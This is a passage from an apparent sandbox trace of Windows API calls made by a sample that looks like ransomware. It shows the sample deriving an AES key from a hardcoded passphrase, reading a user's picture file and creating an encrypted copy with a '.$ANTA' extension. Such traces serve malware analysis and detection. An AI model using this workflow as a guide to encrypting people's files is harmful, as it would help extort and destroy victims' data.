lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0089.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0089.708] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0089.709] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0089.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.709] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0089.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0089.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0089.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0089.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.710] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.710] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0089.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca670, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0089.710] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0089.838] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0089.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0089.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca4a8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0089.838] CryptHashData (hHash=0x41ac740, pbData=0x17e27e8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0089.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.838] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0089.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0089.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca730, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0089.839] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0089.839] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0089.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0089.839] CryptDestroyHash (hHash=0x41ac740) returned 1 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0089.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0089.840] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0089.840] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0089.840] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0089.841] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\qblfci.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0089.841] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.841] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0089.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.842] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0089.842] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.842] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0089.842] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.842] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0089.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0089.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.843] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.843] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359a68 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.844] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0089.844] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0089.845] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391bd0 | out: hHeap=0x1780000) returned 1 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0089.845] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0089.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0089.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0089.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0089.845] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0089.845] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\qBLfci.gif.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\qblfci.gif.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.846] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0089.847] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0089.847] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0089.847] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.847] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.847] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0089.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0089.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.848] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.848] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e04020 [0089.852] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0089.852] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x3a40, lpOverlapped=0x0) returned 1 [0089.852] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0089.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0089.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0089.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3a40) returned 0x4516010 [0089.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e04020 | out: hHeap=0x1780000) returned 1 [0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 